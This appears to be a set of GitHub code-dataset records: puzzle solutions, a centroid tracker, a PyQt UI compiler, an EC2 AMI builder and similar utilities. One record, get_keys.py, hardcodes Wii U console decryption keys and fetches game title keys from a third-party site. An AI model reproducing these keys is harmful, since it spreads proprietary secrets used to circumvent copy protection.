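The lifecycle module above narrows candidates by chaining FilterFunction predicates over (employee, ad_object) tuples. A toy illustration of that pattern with plain dicts; the keys used here are invented for the sketch, not the MO/AD schema.

def filter_not_in_ad(tup):
    employee, ad_object = tup
    return not ad_object                 # keep only employees missing from AD

def filter_has_engagement(tup):
    employee, ad_object = tup
    return employee.get("engaged", False)

pairs = [
    ({"uuid": "a", "engaged": True}, {}),              # create candidate
    ({"uuid": "b", "engaged": True}, {"sam": "b01"}),  # already in AD
    ({"uuid": "c", "engaged": False}, {}),             # no engagement
]
candidates = pairs
for pred in (filter_not_in_ad, filter_has_engagement):
    candidates = filter(pred, candidates)              # lazily compose predicates
print([emp["uuid"] for emp, _ in candidates])          # ['a']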
+{"seq_id":"43860690007","text":"def parse_input(input_lines):\n program = []\n for line in input_lines:\n instruction = line.split()\n if len(instruction) == 2:\n instruction[1] = int(instruction[1])\n program.append(instruction)\n return program\n\ndef simulate(program, callback):\n regValue = 1\n cycle = 0\n for instruction in program:\n cmd = instruction[0]\n if cmd == \"noop\":\n cycle += 1\n callback(cycle, regValue)\n else: #addx\n callback(cycle + 1, regValue)\n cycle += 2\n callback(cycle, regValue)\n regValue += instruction[1]\n\ndef part1(input_lines):\n program = parse_input(input_lines)\n values = []\n def callback(cycle, regValue):\n if cycle % 40 == 20:\n values.append(cycle * regValue)\n simulate(program, callback)\n return sum(values)\n\ndef part2(input_lines):\n program = parse_input(input_lines)\n image = '' \n def callback(cycle, regValue):\n nonlocal image\n horizontalPos = (cycle-1) % 40\n if horizontalPos >= regValue - 1 and horizontalPos <= regValue + 1:\n pixel = '#'\n else:\n pixel = '.'\n image += pixel\n if horizontalPos == 39:\n image += '\\n'\n simulate(program, callback)\n return image\n\nexample_image=\\\n'##..##..##..##..##..##..##..##..##..##..\\n' +\\\n'###...###...###...###...###...###...###.\\n' +\\\n'####....####....####....####....####....\\n' +\\\n'#####.....#####.....#####.....#####.....\\n' +\\\n'######......######......######......####\\n' +\\\n'#######.......#######.......#######.....\\n'\n\nexample_answers = [13140, example_image]","repo_name":"TurboErbo/AdventOfCode","sub_path":"2022/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15276373500","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @File : path.py\r\n# @Author: Zhan\r\n# @Date : 7/18/2019\r\n# @Desc : 数据、模型、字典等文件路径\r\n\r\nimport sys\r\nimport os\r\n\r\nfrom bert import modeling\r\n\r\nfrom flyai.utils import remote_helper\r\n\r\ncPath = os.getcwd()\r\n# 训练数据的路径\r\nDATA_PATH = os.path.join(cPath, 'data', 'input')\r\n# 模型保存的路径\r\nMODEL_PATH = os.path.join(cPath, 'data', 'output', 'model')\r\n# 训练log的输出路径\r\nLOG_PATH = os.path.join(cPath, 'data', 'output', 'logs')\r\n\r\n# 必须使用该方法下载模型,然后加载\r\nBERT_PATH = os.path.dirname(remote_helper.get_remote_date(\"https://www.flyai.com/m/chinese_L-12_H-768_A-12.zip\"))\r\nBERT_PATH = os.path.join(BERT_PATH, 'chinese_L-12_H-768_A-12')\r\nprint('BERT_PATH:{}'.format(BERT_PATH))\r\n# BERT_PATH = r'D:\\jack_doc\\python_src\\flyai\\chinese_L-12_H-768_A-12'\r\nBERT_CONFIG = modeling.BertConfig.from_json_file(os.path.join(BERT_PATH,\"bert_config.json\"))\r\nBERT_CKPT = os.path.join(BERT_PATH,'bert_model.ckpt')\r\nVOCAB_FILE=os.path.join(BERT_PATH,\"vocab.txt\")\r\n\r\n\r\nTENSORFLOW_MODEL_DIR = \"dpNet.ckpt\"","repo_name":"passionzhan/flyai_contest","sub_path":"spamMessage_bert/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"3015757088","text":"# https://programmers.co.kr/learn/courses/30/lessons/42626\nimport heapq\n\ndef solution(scoville, K):\n heapq.heapify(scoville)\n count = 0\n while True:\n first = heapq.heappop(scoville)\n if len(scoville) == 0 and first < K:\n return -1\n elif first >= K:\n return count\n else:\n second = heapq.heappop(scoville)\n new = first + 2*second\n heapq.heappush(scoville, new)\n count += 1\n","repo_name":"hongminpark/prgrms-algorithms","sub_path":"heap/lv2_더맵게.py","file_name":"lv2_더맵게.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4974916366","text":"import os, sys\nimport socket\ndef getLocalIP():\n # s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # s.connect(('localhost', 80))\n # print (s.getsockname())\n # s.close()\n if os.name == 'nt':\n a = socket.getaddrinfo(socket.gethostname(), None, 2, 1, 0)\n print (a)\n\n\ngetLocalIP()\nsys.exit()\n\nfrom functions_s import _PLATFORM, _ROOT_DIR, info_from_db\n\n\nprint(_PLATFORM)\nprint (_ROOT_DIR)\nprint(info_from_db(title=\"startBI\", type=\"txt\"))\nsys.exit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nabsdir = os.path.dirname(os.path.abspath(sys.argv[0]))\nos.chdir(absdir)\nrootdir = os.path.dirname(absdir)\n\n\ndef getServiceSt():\n print (os.getcwd())\n if os.name == 'posix':\n arr_rs = {\n \"mysqld\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"nginx\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"php-fpm\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"startbi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n }\n # for line in os.popen(\"\"\" ps -ef |grep -P \"nginx|php|startBi|mysqld\" | grep -v \"grep\" \"\"\").read().splitlines():\n for line in os.popen(\"\"\" ps -ef \"\"\").read().splitlines():\n line = line.lower().strip()\n if not line:\n continue\n for rs in arr_rs:\n if line.find(rs) >= 0 :\n arr_rs[rs]['status'] = \"running\"\n arr_rs[rs]['code'] = 1\n\n # for rs in arr_rs:\n # if arr_rs[rs]['status'] == \"running\":\n # arr_rs[rs]['path'] = os.popen(\"which %s \" %rs).read().strip()\n\n elif os.name == 'nt':\n arr_rs = {\n \"mysqld\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"nginx\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"php-cgi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"startbi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n }\n\n cmd_str = \"\"\"wmic process where \"name='mysqld.exe' or name='php-cgi.exe' or name='nginx.exe' or commandline='python3.exe startBI.py'\" get caption, commandline, executablePath\"\"\"\n for line in str(os.popen(cmd_str).read()).splitlines():\n line = line.lower().strip()\n if not line:\n continue\n for rs in arr_rs:\n if line.lower().find(rs) >= 0 :\n arr_rs[rs]['status'] = \"running\"\n tabs = line.split(\" \")\n arr_rs[rs]['path'] = os.path.dirname(tabs[-1])\n arr_rs[rs]['code'] = 1 if arr_rs[rs]['path'].find(rootdir) >=0 else -1\n\n return arr_rs\n\nx = getServiceSt()\n\nprint(x)\n\n# from init_db import init_db_main\n\n\n# init_db_main()","repo_name":"hanskimvz/Cosilan","sub_path":"bin/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"14963179576","text":"from day7.Day7 import *\n\n\ndef test_find_possible_outer_bags():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = find_possible_outer_bags('pale indigo bag', rules)\n\n assert result == ['shiny teal bag']\n\n\ndef test_can_contain_target__false():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'shiny olive bag', rules)\n\n assert result is False\n\n\ndef test_can_contain_target__directly_contained():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'dim olive bag', rules)\n\n assert result is True\n\n\ndef test_can_contain_target__indirectly_contained():\n rules = {'vibrant bronze bag': [InnerBag(3, 'shiny teal bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'pale indigo bag', rules)\n\n assert result is True\n\n\ndef test_count_contained_bags():\n rules = {'vibrant bronze bag': [InnerBag(3, 'shiny teal bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = count_contained_bags('vibrant bronze bag', rules)\n\n assert result == 3 + 3 * (1 + 5 + 1)\n\n\ndef test_count_contained_bags__from_another_example():\n rules = {'shiny gold bag': [InnerBag(2, 'dark red bag')],\n 'dark red bag': [InnerBag(2, 'dark orange bag')],\n 'dark orange bag': [InnerBag(2, 'dark yellow bag')],\n 'dark yellow bag': [InnerBag(2, 'dark green bag')],\n 'dark green bag': [InnerBag(2, 'dark blue bag')],\n 'dark blue bag': [InnerBag(2, 'dark violet bag')],\n 'dark violet bag': []}\n\n result = count_contained_bags('shiny gold bag', rules)\n\n assert result == 126\n\n\ndef test_count_contained_bags__from_example():\n rules = {'shiny gold bag': [InnerBag(1, 'dark olive bag'), InnerBag(2, 'vibrant plum bag')],\n 'dark olive bag': [InnerBag(3, 'faded blue bag'), InnerBag(4, 'dotted black bag')],\n 'vibrant plum bag': [InnerBag(5, 'faded blue bag'), InnerBag(6, 'dotted black bag')],\n 'faded blue bag': [],\n 'dotted black bag': []}\n\n result = count_contained_bags('shiny gold bag', rules)\n\n assert result == 32\n","repo_name":"treegem/AdventOfCode2020","sub_path":"src/test/day7/test_day7.py","file_name":"test_day7.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"36779313525","text":"#!/usr/bin/python\nfrom urllib2 import urlopen\nimport json, unicodedata\n\n\nurl='https://wiiu.titlekeys.com/json'\nresponse = urlopen(url)\nparsed = json.load(response)\nkey_file = open(\"keys.txt\",'w') \nkey_file.write(\"\"\"#Common Keys#\nD7B00402659BA2ABD2CB0DB27FA2B656 # Wii U Common Key:\n805E6285CD487DE0FAFFAA65A6985E17 # Wii U Espresso Ancast Key\nB5D8AB06ED7F6CFC529F2CE1B4EA32FD # Wii U Starbuck Ancast Key\n############################################################\n\n\"\"\")\ndata=''\nfor i in xrange(len(parsed)):\n if parsed[i]['titleKey'] == None or parsed[i]['name'] == None:\n pass\n else:\n key = parsed[i]['titleKey']\n name = parsed[i]['name']\n name = name.replace('\\n','').replace('\\t','')\n name = unicodedata.normalize('NFKD', name).encode('ascii','ignore')\n region = parsed[i]['region']\n line_data = str(key),' # ',name,' (',region,')'\n normalized_data = \"\".join(line_data)\n key_file.write(\"%s\\n\" %normalized_data)\nkey_file.close()\n","repo_name":"d0t1q/wiiu_keys","sub_path":"get_keys.py","file_name":"get_keys.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"30136138028","text":"from collections import deque\nfrom sys import stdin\ndef input(): return stdin.readline().strip()\n\n\ndef read_int():\n return int(input())\n\n\ndef read_ints():\n return map(int, input().split())\n\n\nt = read_int()\nfor case_num in range(t):\n n = read_int()\n d = [list(read_ints()) for _ in range(n)]\n mem = [[] for _ in range(n + 1)]\n valid = True\n for i, (u, v) in enumerate(d):\n if u == v:\n valid = False\n break\n mem[u].append(i)\n mem[v].append(i)\n if len(mem[u]) > 2 or len(mem[v]) > 2:\n valid = False\n break\n\n if not valid:\n print('NO')\n continue\n\n vis = [False] * (n + 1)\n num = [set() for _ in range(3)]\n state = [0] * n\n\n for i in range(1, n + 1):\n if vis[i]:\n continue\n\n dq = deque()\n dq.append(i)\n\n while len(dq) > 0:\n u = dq.popleft()\n a, b = mem[u]\n if state[a] == state[b] == 0:\n state[a] = 1\n state[b] = 2\n num[1].add(u)\n up1 = d[a][0] + d[a][1] - u\n num[1].add(up1)\n if not vis[up1]:\n vis[up1] = True\n dq.append(up1)\n\n num[2].add(u)\n up2 = d[b][0] + d[b][1] - u\n num[2].add(up2)\n if not vis[up2]:\n vis[up2] = True\n dq.append(up2)\n elif state[a] + state[b] == 3:\n continue\n elif state[a] == state[b]:\n valid = False\n break\n elif state[a] > 0:\n state[b] = 3 - state[a]\n num[state[b]].add(u)\n up2 = d[b][0] + d[b][1] - u\n num[state[b]].add(up2)\n if not vis[up2]:\n vis[up2] = True\n dq.append(up2)\n elif state[b] > 0:\n state[a] = 3 - state[b]\n num[state[a]].add(u)\n up1 = d[a][0] + d[a][1] - u\n num[state[a]].add(up1)\n if not vis[up1]:\n vis[up1] = True\n dq.append(up1)\n\n if not valid:\n break\n\n print('YES' if valid else 'NO')\n","repo_name":"lucifer1004/codeforces","sub_path":"1702/e/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"15063188398","text":"# coding=utf-8\nfrom scipy.spatial import distance as dist\nfrom collections import OrderedDict\nimport numpy as np\n\nclass CentroidTracker:\n def __init__(self, maxDisappeared=50, maxDistance=50):\n # Inicializamos el próximo Object ID único, junto a dos diccionarios ordenados,\n # que se utilizarán para mantener constancia de los objetos que se están siguiendo\n # (y calculando su centroide), y para mantener dichos objetos que ya no son visibles\n # durante un periodo de tiempom antes de marcarlos como perdidos.\n self.nextObjectID = 0\n self.objects = OrderedDict()\n self.disappeared = OrderedDict()\n\n # Cual es el número de frames consecutivos máximo que un objeto puede estar\n # desaparecido antes de ser desregistrado como objeto.\n self.maxDisappeared = maxDisappeared\n\n self.maxDistance = maxDistance\n\n def register(self, centroid):\n # Cuando registramos un objeto, utilizamos el siguiente ID disponible\n # para almacenar su centroide.\n self.objects[self.nextObjectID] = centroid\n self.disappeared[self.nextObjectID] = 0\n self.nextObjectID += 1\n\n def deregister(self, objectID):\n # Una vez se ha dado por perdido un objeto, desregistramos su ID.\n del self.objects[objectID]\n del self.disappeared[objectID]\n\n def update(self, rects):\n # Comprobamos si la lista de bounding boxes (rects) está vacía.\n if len(rects) == 0:\n # Si teníamos algún objeto marcado como tracked, lo marcamos como desaparecido.\n for objectID in list(self.disappeared.keys()):\n self.disappeared[objectID] += 1\n # Si hemos alcanzado el máximo número de frames consecutivos,\n # desregistramos el objeto\n if self.disappeared[objectID] > self.maxDisappeared:\n self.deregister(objectID)\n # No existen centroides para trackear.\n return self.objects\n\n # Inicializamos un array para los centroides recibidos en el frame actual, y lo\n # inicializamos a 0\n inputCentroids = np.zeros((len(rects), 2), dtype=\"int\")\n\n # Iteramos sobre las bounding boxes\n for (i, (startX, startY, endX, endY)) in enumerate(rects):\n # Calculamos el centroide\n cX = int((startX + endX) / 2.0)\n cY = int((startY + endY) / 2.0)\n inputCentroids[i] = (cX, cY)\n\n # Si no estamos trackeando ningun objeto, registramos los nuevos centroides\n if len(self.objects) == 0:\n for i in range(0, len(inputCentroids)):\n self.register(inputCentroids[i])\n\n # Si ya estamos trackeando algún objeto, primero intentamos emparejar\n # los nuevos centroides con los que eisten ya de los objetos tackeados.\n else:\n # Obtenemos los IDs y centroides de los objetos\n objectIDs = list(self.objects.keys())\n objectCentroids = list(self.objects.values())\n\n # Calculamos la distancia entre cada par de centroide trackeado y\n # de nuevos centroides. Nuestro objetivo es emparejar un nuevo centroide con alguno\n # de los existentes.\n D = dist.cdist(np.array(objectCentroids), inputCentroids)\n\n # Para poder emparejarlos, debemos encontrar el valor más pequeño en cada fila,\n # y entonces ordenar la fila por indexes de menor a mayor valor. De tal forma que\n # la fila con el valor más pequeño quede al principio.\n # axis = 0 es columnas, axis = 1 es filas.\n # TODO Probar esto y que es argsort()\n\n # Después de entender mejor, esto devuelve el valor mínimo de cada fila, y además,\n # los ordena de menor a mayor, y devuelve un array del siguiente tipo, por ejemplo,\n # si tuvieramos solo 2 rows: rows = [1,0]. 
Es to significaría que el valor mínimo\n # se encuentra en la row 1, y el siguiente valor mínimo en la row 0, y así.\n rows = D.min(axis=1).argsort()\n\n # Después, buscamos los valores mínimos en cada columna, y ordenándolos\n # utilizando los index de las filas calculados anteriormente\n # axis = 0 es columnas, axis = 1 es filas.\n\n # Después, el argmin hace lo mismo que el min, devuelve las\n # columnas con los valores mínimos de cada fila, en el caso de tener 2 filas,\n # podría devolver algo como, cols = [1, 2], indicando que en la columna 1 se encuentra\n # el valor más pequeño de la fila 0, y en la columna 2 se encuentra el valor más pequeño\n # de la columna 1. El [rows] del final sirve para ordenar los valores por filas, por tanto\n # si el valor de la fila 1, es menor que le de la fila 0, el resultado de cols será,\n # cols = [2, 1].\n cols = D.argmin(axis=1)[rows]\n\n # Para determinar si tenemos que actualizar, registrar o desregistrar un objeto,\n # debemos trackear cual de los indexes de las filas y columnas ya hemos examinado.\n usedRows = set()\n usedCols = set()\n\n # Iteramos sobre cada tupla de combinación de index (fila, columna)\n # Zip devuelve un iterador de tuplas\n\n # Después, el zip lo que hace es combinar las filas con las columnas, si por ejemplo las\n # rows = [1, 0], y las cols = [2, 1], entonces el zip(rows, cols) = [(1, 2), (0, 1)]\n # Esto implica, que el segundo objeto existente, hará match con el tercer input centroid,\n # ya que el zip devuelve (1, 2), y del mismo modo, el primer objeto existente hará match\n # con el segundo input centroid (0, 1).\n for (row, col) in zip(rows, cols):\n\n # Si ya hemos examinado la fila o la columna, la ignoramos\n if row in usedRows or col in usedCols:\n continue\n\n # if the distance between centroids is greater than\n # the maximum distance, do not associate the two\n # centroids to the same object\n if D[row, col] > self.maxDistance:\n continue\n\n # Si no, obtenemos el objectID de la fila actual, establecemos su\n # nuevo centroide y reseteamos el contador de desaparecido.\n objectID = objectIDs[row]\n self.objects[objectID] = inputCentroids[col]\n self.disappeared[objectID] = 0\n\n # Indicamos que hemos examinado el index de la fila y la columna.\n usedRows.add(row)\n usedCols.add(col)\n\n # Calculamos el indice de la fila y columna que todavia no hemos examinado\n unusedRows = set(range(0, D.shape[0])).difference(usedRows)\n unusedCols = set(range(0, D.shape[1])).difference(usedCols)\n\n # En el caso de que el numero de centroides de objeto es mayor o igual\n # al numero de nuevos centroides, debemos comprobar si algunos objetos\n # han desaparecido\n if D.shape[0] >= D.shape[1]:\n\n # Iterar sobre las filas sin examinar\n for row in unusedRows:\n\n # Obtener el ID del objeto de la fila correspondiente\n # e incrementar el contador de desaparecido.\n objectID = objectIDs[row]\n self.disappeared[objectID] += 1\n\n # Revisamos que el contador no haya llegado a su límite, si es así\n # desregistramos el objeto\n # for warrants deregistering the object\n if self.disappeared[objectID] > self.maxDisappeared:\n self.deregister(objectID)\n\n # Si no, si el número de nuevos centroides es mayor que el número de \n # centroides registrados, debemos registrar todos los nuevos.\n else:\n for col in unusedCols:\n self.register(inputCentroids[col])\n\n # Devolvemos los objetos trackeables\n return 
self.objects\n","repo_name":"alu0100881165/tfg","sub_path":"centroidTrackable/centroidtracker.py","file_name":"centroidtracker.py","file_ext":"py","file_size_in_byte":8195,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
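A minimal usage sketch for the tracker above: feed it bounding boxes frame by frame, and the same physical object keeps its ID while its centroid moves; an empty frame only increments the disappeared counter.

ct = CentroidTracker(maxDisappeared=5, maxDistance=50)
print(ct.update([(10, 10, 30, 30)]))  # frame 1: ID 0 registered at centroid (20, 20)
print(ct.update([(18, 12, 38, 32)]))  # frame 2: still ID 0, centroid now (28, 22)
print(ct.update([]))                  # frame 3: no detections, ID 0 marked disappeared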
+{"seq_id":"39782816878","text":"import gym\nfrom stable_baselines import A2C\nfrom stable_baselines.common.vec_env import DummyVecEnv\nfrom stable_baselines.bench import Monitor\nimport numpy as np\nimport os\n\n\n# 正常的 Gym-wrapper, 没有完成任何工作\nclass CustomWrapper(gym.Wrapper):\n def __init__(self, env):\n # 输出参数只有一个, 是 env\n super(CustomWrapper, self).__init__(env)\n\n def reset(self):\n obs = self.env.reset()\n return obs\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n return obs, reward, done, info\n\n##############################\n# 1. 限制周期长度的wrapper\n##############################\n\n\nclass TimeLimitWrapper(gym.Wrapper):\n ## 显示了周期的最大长度. 在 init 里面初始化 max_steps, 在 step 中检测如果超过 max_steps 就将 done 设为 True\n def __init__(self, env, max_steps=100):\n super(TimeLimitWrapper, self).__init__(env)\n self.max_steps = max_steps\n self.current_step = 0\n\n def reset(self):\n self.current_step = 0\n return self.env.reset()\n\n def step(self, action):\n self.current_step += 1\n obs, reward, done, info = self.env.step(action)\n if self.current_step >= self.max_steps:\n done = True\n info['time_limit_reached'] = True\n return obs, reward, done, info\n\n\ndef test_time_limit_wrapper():\n # 100 {'time_limit_reached': True}\n env = gym.make(\"Pendulum-v0\")\n env = TimeLimitWrapper(env, max_steps=100)\n obs = env.reset()\n done = False\n n_steps = 0\n while not done:\n random_action = env.action_space.sample()\n obs, reward, done, info = env.step(random_action)\n n_steps += 1\n print(n_steps, info)\n\n##############################\n# 2. 限制动作范围的 wrapper\n##############################\n\n\nclass NormalizeActionWrapper(gym.Wrapper):\n # 将 action space 规约到 -1~1 之间\n # step 函数中, 将输入的 (-1,1) 的动作, 重新规约到原来的动作空间中, 再调用函数进行 step\n def __init__(self, env):\n # 保留原来的 action space 的范围\n action_space = env.action_space\n self.low, self.high = action_space.low, action_space.high\n # 重置 action space 为 [-1,1] 之间\n env.action_space = gym.spaces.Box(low=-1, high=1, shape=action_space.shape, dtype=np.float32)\n super(NormalizeActionWrapper, self).__init__(env)\n\n def rescale_action(self, scaled_action):\n # 将输入 x~[-1, 1] 之间的动作重新规约到 y~[self.low, high] 之间\n # y = (x-(-1))*[(high-low)/(1-(-1))]+low\n return (scaled_action + 1.0) * (self.high - self.low) * 0.5 + self.low\n\n def reset(self):\n return self.env.reset()\n\n def step(self, action):\n rescaled_action = self.rescale_action(action)\n obs, reward, done, info = self.env.step(rescaled_action)\n return obs, reward, done, info\n\n\ndef test_normalize_action_wrapper():\n # 在原始初始化的 env 中采样多个动作, 随后再 NormalizeActionWrapper 后的 env 中采样多个动作\n env = gym.make(\"Pendulum-v0\")\n print(\"original env:\", env.action_space.low, env.action_space.high)\n env.reset()\n for _ in range(5):\n print(\"sample action:\", env.action_space.sample())\n\n # wrapper\n env = NormalizeActionWrapper(env)\n env.reset()\n for _ in range(5):\n print(\"Normalized action:\", env.action_space.sample())\n\n\n##############################\n# 3. wrapper 与 stable baselines 中的 agent 结合进行训练\n##############################\n\n\n# Monitor 可以记录环境在运行过程中产生的记录 mean episode reward, mean episode length\ndef test_monitor():\n env = gym.make('Pendulum-v0')\n env = Monitor(gym.make('Pendulum-v0'), filename=None, allow_early_resets=True)\n normalized_env = NormalizeActionWrapper(env)\n normalized_env = DummyVecEnv([lambda: normalized_env])\n # model\n model_2 = A2C('MlpPolicy', normalized_env, verbose=1).learn(1000)\n\n\n################################\n# 4. 
VecNormalize 是 stable baselines 中提供的规约, 记录在运行过程中的 state 的 std 和 return 的 std\n################################\nfrom stable_baselines.common.vec_env import VecNormalize, VecFrameStack\n\n\ndef test_vec_normalize():\n env = DummyVecEnv([lambda: gym.make(\"Pendulum-v0\")])\n normalized_vec_env = VecNormalize(env)\n obs = normalized_vec_env.reset()\n for _ in range(10):\n action = [normalized_vec_env.action_space.sample()]\n obs, reward, _, _ = normalized_vec_env.step(action)\n print(obs, reward)\n\n################################\n# 5. VecFrameStack 用于在 Atari 将相邻几帧进行叠加\n################################\n\n\ndef test_frame_stack():\n env = DummyVecEnv([lambda: gym.make(\"Pendulum-v0\")])\n obs = env.reset()\n print(\"Before FrameStack, observation.shape =\", obs.shape) # (1, 3)\n\n frame_stack_env = VecFrameStack(env, n_stack=4) # 叠加连续的 4 帧组成状态\n obs = frame_stack_env.reset()\n print(\"After FrameStack, observation.shape =\", obs.shape) # (1, 12)\n\n\nif __name__ == '__main__':\n # test_time_limit_wrapper()\n # test_normalize_action_wrapper()\n # test_monitor()\n # test_vec_normalize()\n test_frame_stack()\n\n\n\n","repo_name":"Baichenjia/Stable-Baselines-Basic","sub_path":"4-Gym-wrapper.py","file_name":"4-Gym-wrapper.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
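A quick standalone check of the rescaling formula used by NormalizeActionWrapper above, for Pendulum's torque bounds [-2, 2]: the endpoints and midpoint of [-1, 1] map back onto the original range.

low, high = -2.0, 2.0
rescale = lambda x: (x + 1.0) * (high - low) * 0.5 + low
print(rescale(-1.0), rescale(0.0), rescale(1.0))  # -2.0 0.0 2.0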
+{"seq_id":"7059144327","text":"import pathlib\n\nimport click\nimport PyQt5.uic\n\n\n@click.command()\n@click.option(\n \"--ui\",\n \"ui_paths\",\n multiple=True,\n type=click.Path(exists=True, dir_okay=False),\n)\n@click.option(\n \"--directory\",\n \"--dir\",\n \"directories\",\n default=[\".\"],\n multiple=True,\n type=click.Path(exists=True, file_okay=False),\n)\n@click.option(\"--suffix\", default=\"_ui\")\n@click.option(\"--encoding\", default=\"utf-8\")\ndef cli(ui_paths, directories, suffix, encoding):\n ui_paths = [pathlib.Path(path) for path in ui_paths]\n\n for directory in directories:\n path = pathlib.Path(directory)\n found_paths = path.rglob(\"*.ui\")\n ui_paths.extend(found_paths)\n\n for path in ui_paths:\n in_path = path\n out_path = path.with_name(f\"{path.stem}{suffix}.py\")\n\n click.echo(f\"Converting: {in_path} -> {out_path}\")\n with open(out_path, \"w\", encoding=encoding) as out_file:\n PyQt5.uic.compileUi(in_path, out_file)\n","repo_name":"epcpower/stlib","sub_path":"epyqlib/compileui.py","file_name":"compileui.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9920674960","text":"#!/usr/bin/python2\n\nimport boto3, argparse, urllib, time, json, subprocess, os.path\nimport argparse\n\nclass Metadata(object):\n base = 'http://169.254.169.254/latest/meta-data/'\n def _get(self, what):\n return urllib.urlopen(Metadata.base + what).read()\n def instance_id(self):\n return self._get('instance-id')\n def availability_zone(self):\n return self._get('placement/availability-zone')\n def region(self):\n return self.availability_zone()[:-1]\n\ndef wait_for(ec2_obj, status='available'):\n while ec2_obj.state != status:\n #print('object status {} wanted {}'.format(ec2_obj.status, status))\n time.sleep(1)\n ec2_obj.reload()\n\n#input = '/home/ubuntu/capstan-java-example.img'\ninput = '/home/ubuntu/small-osv-node.img'\n\ndef to_gib(size):\n gib = 1 << 30\n return (size + gib - 1) >> 30\n\ndef image_size(filename):\n info = json.loads(subprocess.check_output(['qemu-img', 'info', '--output=json', filename]))\n return info['virtual-size']\n\ndef copy_image(img, out):\n subprocess.check_call(['sudo', 'cp', img, out])\n\ndef make_ami(input, name):\n metadata = Metadata()\n print('Connecting')\n conn = boto3.resource('ec2',region_name=\"us-west-2\")\n #conn = ec2.connect_to_region(metadata.region())\n print('Creating volume')\n vol = conn.create_volume(Size=to_gib(image_size(input)),\n AvailabilityZone=metadata.availability_zone(),\n )\n print('Waiting for {}'.format(vol.id))\n wait_for(vol)\n #vol = conn.describe_volumes([vol.id])[0]\n print('Attaching {} to {}'.format(vol.id, metadata.instance_id()))\n att = vol.attach_to_instance(InstanceId=metadata.instance_id(), Device='xvdf')\n while not os.path.exists('/dev/xvdf'):\n #print('waiting for volume to attach')\n time.sleep(1)\n print('Copying image')\n copy_image(input, '/dev/xvdf')\n print('Detaching {}'.format(vol.id))\n vol.detach_from_instance()\n print('Creating snapshot from {}'.format(vol.id))\n snap = vol.create_snapshot()\n #snap = conn.get_all_snapshots([snap.id])[0]\n wait_for(snap, 'completed')\n print('Deleting {}'.format(vol.id))\n vol.delete()\n print('Registering image from {}'.format(snap.id))\n ami = conn.register_image(Name=name,\n Architecture='x86_64',\n RootDeviceName='xvda',\n VirtualizationType='hvm',\n BlockDeviceMappings=[\n { \n \t\t\t\t'Ebs': {\n \t \t\t\t 'SnapshotId': snap.id,\n \t\t\t'VolumeSize': 123,\n \t\t\t 'DeleteOnTermination': True\n }\n \t\t\t},\n\t\t\t ])\n print('ami {} created\\n'.format(ami))\n return ami\n\nif __name__ == \"__main__\":\n # Parse arguments\n parser = argparse.ArgumentParser(prog='run')\n parser.add_argument(\"-n\", \"--name\", action=\"store\", default=\"test-ami\",\n help=\"ami name to be created\")\n\n args = parser.parse_args()\n make_ami(input, args.name)\n","repo_name":"ClosingBracket/osv","sub_path":"scripts/ec2-make-MY-ami.py","file_name":"ec2-make-MY-ami.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
